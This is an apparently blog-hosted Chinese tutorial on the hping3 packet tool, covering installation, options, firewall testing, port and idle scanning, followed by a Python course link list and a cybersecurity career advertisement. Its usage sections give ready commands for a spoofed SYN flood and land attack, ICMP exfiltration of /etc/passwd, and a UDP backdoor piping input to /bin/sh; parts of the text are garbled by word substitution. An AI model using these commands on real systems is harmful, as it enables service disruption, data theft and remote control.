【linux下令讲授大全】141.hping3:测试网络及主机的安全
文章目录[*]hping3
[*] * 补充说明
[*]安装
[*]选项
[*]Hping3功能
[*] * 防火墙测试
[*]端口扫描
[*]Idle扫描
[*]拒绝服务攻击
[*]文件传输
[*]木马功能
[*]从零学 python
hping3
测试网络及主机的安全
增补说明
hping 是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore
Sanfilippo。目前最新版是hping3,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping上风在于能够定制数据包的各个部分,因此用户可以灵活对目的机进行细致地探测。
安装
yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install
选项
-H, --help 显示帮助。
-v, -VERSION 版本信息。
-c, --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。
-i, --interval 包发送间隔时间(单位是毫秒)缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。
-n, -nmeric 数字输出,象征性输出主机地址。
-q, -quiet 退出。
-I, --interface interface name 无非就是eth0之类的参数。
-v, --verbose 显示很多信息,TCP回应一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D, --debug 进入debug模式当你遇到麻烦时,比如用HPING遇到一些不合你习惯的时候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z, --bind 快捷键的使用。
-Z, --unbind 消除快捷键。
-O, --rawip RAWIP模式,在此模式下HPING会发送带数据的IP头。
-1, --icmp ICMP模式,此模式下HPING会发送IGMP应答报,你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2, --udp UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,你可以用--baseport --destport --keep选项指定其模式。
-9, --listen signatuer hping的listen模式,用此模式,HPING会接收指定的数据。
-a, --spoof hostname 伪造IP攻击,防火墙就不会记录你的真实IP了,当然回应的包你也接收不到了。
-t, --ttl time to live 可以指定发出包的TTL值。
-H, --ipproto 在RAW IP模式里选择IP协议。
-w, --WINID UNIX ,WINDIWS的id回应不同的,这选项可以让你的ID回应和WINDOWS一样。
-r, --rel 更改ID的,可以让ID曾递减输出,详见HPING-HOWTO。
-F, --FRAG 更改包的FRAG,这可以测试对方对于包碎片的处理能力,缺省的“virtual mtu”是16字节。
-x, --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。
-y, -dontfrag 发送不可恢复的IP碎片,这可以让你了解更多的MTU PATH DISCOVERY。
-G, --fragoff fragment offset value set the fragment offset
-m, --mtu mtu value 用此项后ID数值变得很大,50000没指定此项时3000-20000左右。
-G, --rroute 记录路由,可以看到详悉的数据等等,最多可以经过9个路由,即使主机屏蔽了ICMP报文。
-C, --ICMPTYPE type 指定ICMP类型,缺省是ICMP echo REQUEST。
-K, --ICMPCODE CODE 指定ICMP代号,缺省0。
--icmp-ipver 把IP版本也插入IP头。
--icmp-iphlen 设置IP头的长度,缺省为5(32字节)。
--icmp-iplen 设置IP包长度。
--icmp-ipid 设置ICMP报文IP头的ID,缺省是RANDOM。
--icmp-ipproto 设置协议的,缺省是TCP。
--icmp-cksum 设置校验和。
--icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s, --baseport source port hping 用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义。
-p, --deskport [+][+]desk port 设置目标端口,缺省为0,一个加号设置为:每发送一个请求包到达后,端口加1,两个加号为:每发一个包,端口数加1。
--keep 上面说过了。
-w, --win 发的大小和windows一样大,64BYTE。
-O, --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m, --tcpseq 设置TCP序列数。
-l, --tcpck 设置TCP ack。
-Q, --seqnum 搜集序列号的,这对于你分析TCP序列号有很大作用。
Hping3功能
Hping3重要有以下典范功能应用:
防火墙测试
使用Hping3指定各种数据包字段,依次对防火墙进行详细测试。请参考:http://0daysecurity.com/articles/hping3_examples.html
测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击(DoS
attack)。例如,以LandAttack方式测试目的防火墙(Land Attack是将发送源地址设置为与目的地址相同,诱使目的机与自己不停地建立连接)。
hping3 -S-c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
端口扫描
Hping3也可以对目的端口进行扫描。Hping3支持指定TCP各个标记位、长度等信息。以下示例可用于探测目的机的80端口是否开放:
hping3 -I eth0-S 192.168.10.1 -p 80
其中-I eth0指定使用eth0端口,-S指定TCP包的标记位SYN,-p 80指定探测的目的端口。
hping3支持非常丰富的端口探测方式,nmap拥有的扫描方式hping3险些都支持(除开connect方式,由于Hping3仅发送与接收包,不会维护连接,所以不支持connect方式探测)。而且Hping3能够对发送的探测进行更加精细的控制,方便用户微调探测效果。当然,Hping3的端口扫描性能及综合处置处罚本领,无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。
Idle扫描
Idle扫描(Idle Scanning)是一种匿名扫描长途主机的方式,该方式也是有Hping3的作者Salvatore
Sanfilippo发明的,目前Idle扫描在Nmap中也有实现。
该扫描原理是:寻找一台idle主机(该主机没有任何的网络流量,并且IPID是逐个增长的),攻击端主机先向idle主机发送探测包,从回复包中获取其IPID。假冒idle主机的IP地址向长途主机的端口发送SYN包(此处假设为SYN包),此时如果长途主机的目的端口开放,那么会回复SYN/ACK,此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包,获取其IPID。那么对比两次的IPID值,我们就可以判定长途主机是否回复了数据包,从而间接地推测其端口状态。
拒绝服务攻击
使用Hping3可以很方便构建拒绝服务攻击。比如对目的机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
其他攻击如smurf、teardrop、land attack等也很轻易构建出来。
文件传输
Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相称于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名(签名为用户指定的字符串)的内容进行相应的解析。在接收端开启服务:
hping3 192.168.1.159--listen signature --safe--icmp
监听ICMP包中的签名,根据签名解析出文件内容。
在发送端使用签名打包的ICMP包发送文件:
hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包巨细为100字节(-d
100),发送签名为signature(-sign signature)。
木马功能
如果Hping3能够在长途主机上启动,那么可以作为木马程序启动监听端口,并在建立连接后打开shell通信。与netcat的后门功能类似。
示例:本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh实行。
在木马启动端:
hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh
在长途控制端:
echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
将包含ls下令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
当然这里只是简单的演示程序,真实的场景,控制端可以利益shell实行很多的高级复杂的操纵。
从零学 python
【从零学习python
】92.使用Python的requests库发送HTTP哀求和处置处罚响应
【从零学习python 】91.
使用装饰器和字典管理哀求路径的简洁Web应用
【从零学习python
】93.使用字典管理哀求路径
【从零学习python 】89.
使用WSGI搭建简单高效的Web服务器
【从零学习python 】88.
WSGI接口详解:实现简单高效的Web开发
【从零学习python 】87.
手动搭建HTTP服务器的Python实现及多线程并发处置处罚
【从零学习python 】86.
深入了解HTTP协议及其在浏览器和服务器通信中的作用
【从零学习python
】85.Python进程池的并行盘算技术应用
【从零学习python
】84.深入明白线程和进程
【从零学习python 】83.
Python多进程编程与进程池的使用
【从零学习python 】82.
基于多线程的聊天程序实现
【从零学习python
】81.Python多线程通信与队列的应用
【从零学习python
】80.线程访问全局变量与线程安全标题
【从零学习python 】79.
线程访问全局变量与线程安全标题
【从零学习python 】78.
文件下载案例
【从零学习python 】77.
TCP服务端编程及注意事项
【从零学习python
】76.服务器与客户端:网络通信的关键组成部分
【从零学习python 】75.
TCP协议:可靠的面向连接的传输层通信协议
【从零学习python 】74.
UDP网络程序:端口标题与绑定信息详解
【从零学习python 】73. UDP网络程序-
发送数据
【从零学习python 】72.
深入明白Socket通信及创建套接字的方法
【从零学习python 】71.
网络端口及其作用
【从零学习python
】70.网络通信方式及其应用:从直接通信到路由器连接多个网络
【从零学习python 】69.
网络通信及IP地址分类解析
【从零学习python 】68.
Python正则表达式中的贪心和非贪心模式
【从零学习python
】67.Python中的re模块:正则替换与高级匹配技术
【从零学习python
】66.深入了解正则表达式:模式匹配与文本处置处罚的利器
【从零学习python 】65.
Python正则表达式修饰符及其应用详解
【从零学习python 】64.
Python正则表达式中re.compile方法的使用详解
【从零学习python
】63.正则表达式中的re.Match类及其属性和方法先容
【从零学习python 】62.
Python正则表达式:强盛的字符串匹配工具
【从零学习python
】61.Python中的property属性详解和应用示例
【从零学习python
】60.探索生成器:迭代的灵活利器
【从零学习python
】59.迭代器:优化数据遍历的高效工具
【从零学习python
】58.Python中的自界说非常及引发非常的方法
【从零学习python
】57.Python中使用with关键字精确关闭资源
【从零学习python 】56.
非常处置处罚在程序设计中的重要性与应用
【从零学习python
】55.Python中的序列化和反序列化,JSON与pickle模块的应用
【从零学习python 】54.
内存中写入数据
【从零学习python 】53.
CSV文件和Python的CSV模块
【从零学习python 】52.文件的读写 -
Python文件操纵指南
【从零学习python
】51.文件的打开与关闭及其在Python中的应用
【从零学习python 】49.
Python中对象相关的内置函数及其用法
【从零学习python
】48.Python中的继续与多继续详解
【从零学习python 】47.
面向对象编程中的继续概念及基本使用
【从零学习python 】46.
Python中的__new__和__init__方法解析及单例设计模式
【从零学习python
】45.Python中的类方法和静态方法
【从零学习python
】44.面向对象编程中的私有属性和方法
【从零学习python 】43.
Python面向对象编程中的实例属性和类属性
【从零学习python
】42.Python中的内置属性和方法
【从零学习python
】41.python魔法方法(二)
【从零学习python
】40.python魔法方法(一)
【从零学习python
】39.面向对象基本语法及应用示例
【从零学习python
】38.Python包的使用及导入方式
【从零学习python
】37.Python自界说模块的使用和注意事项
【从零学习python
】36.Python中使用pip进行第三方包管理的方法与本领
【从零学习python 】35.
Python常见系统模块及其用法
【从零学习python
】34.Python模块的导入和使用方法详解
【从零学习python
】33.装饰器的作用(二)
【从零学习python
】32.装饰器的作用(一)
【从零学习python
】31.深入明白Python中的高阶函数和闭包
【从零学习python
】30.深入明白递归函数和匿名函数
【从零学习python 】29.
「函数参数详解」——了解Python函数参数的不同用法
【从零学习python 】28.
Python中的局部变量和全局变量
【从零学习python 】27. Python
函数的使用及嵌套调用
【从零学习python
】25.函数:提高代码编写效率的利器
【从零学习python 】24.
Python中的字符串操纵与遍历方法
【从零学习python 】23.
Python中集合(set)的使用方法和常见操纵
【从零学习python 】22.
Python中的字典的增删改查及字典的变量
【从零学习python
】21.Python中的元组与字典
【从零学习python 】20.
Python列表操纵本领及实例
【从零学习python 】19.
循环遍历列表和列表嵌套的应用
【从零学习python 】18.
Python列表的基本操纵详解(一)
【从零学习python 】17.
Python字符串的format方法(二)
【从零学习python 】16.
Python字符串的format方法(一)
【从零学习python
】15.深入了解字符串及字符集编码
【从零学习python
】14.Python字符串常见操纵(二)
【从零学习python
】13.Python字符串常见操纵(一)
【从零学习python
】12.Python字符串操纵与应用
【从零学习python
】11.Python循环语句和控制流程
【从零学习python
】10.Python条件语句和if嵌套详解
【从零学习python 】09.Python
中的条件判定语句
【从零学习python 】08.Python了解位运算符,
运算符优先级
【从零学习python
】07.Python运算符详解:赋值、比较和逻辑运算符
【从零学习python 】06.
Python中运用算数运算符进行盘算和字符串拼接
【从零学习python 】05.
Python中的输出和输入
【从零学习python 】04.
Python编程底子:变量、数据类型与标识符
【从零学习python 】03.
Python交互式编程及注释详解
【从零学习python 】02.
开发工具先容
【从零学习python 】01.
安装配置python
题外话
初入盘算机行业的人或者大学盘算机相关专业毕业生,很多因缺少实战经验,就业处处碰钉子。下面我们来看两组数据:
2023届天下高校毕业生预计达到1158万人,就业形势严峻;
国家网络安全宣传周公布的数据表现,到2027年我国网络安全职员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科盘算机类、高职自动化类专业月收入较高。2022届本科盘算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科盘算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
详细看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳固至关重要的因素之一。
https://img-blog.csdnimg.cn/img_convert/16c400294b6fda8f01400f24f1f12b0c.png
网络安全行业特点
1、就业薪资非常高,涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
https://img-blog.csdnimg.cn/img_convert/d5f06d6b9945fd6e8a5f92a0198e5446.png
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而天下各大学校每年培养的职员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,如今从事网络安全行业的从业职员只有10W人。
https://img-blog.csdnimg.cn/img_convert/9cf857398f52a97ff49d437ac5fe690a.png
行业发展空间大,岗位非常多
网络安全行业财产以来,随即新增长了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难规复专业职员、实战攻防专业职员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争上风。
随着个人本领的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家接待的重要原因。
从某种程度来讲,在网络安全范畴,跟医生职业一样,越老越吃香,由于技术愈加成熟,天然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全怎样学习
本日只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
黑客&网络安全怎样学习
本日只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习门路图
https://img-blog.csdnimg.cn/img_convert/f6d7a70326a6c0071cc4dc6b3eeb8f95.png
2.视频教程
网上虽然也有很多的学习资源,但基本上都残破不全的,这是我自己录的网安视频教程,上面门路图的每一个知识点,我都有配套的视频讲授。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试底子、毛病详解、盘算机底子知识等,都是网络安全入门必知必会的学习内容。
https://img-blog.csdnimg.cn/img_convert/0d8fcc94a8238255b741c19633efd10c.jpeg
(都打包成一块的了,不能逐一睁开,总共300多集)
如果你对网络安全入门感兴趣,那么你点击这里
页:
[1]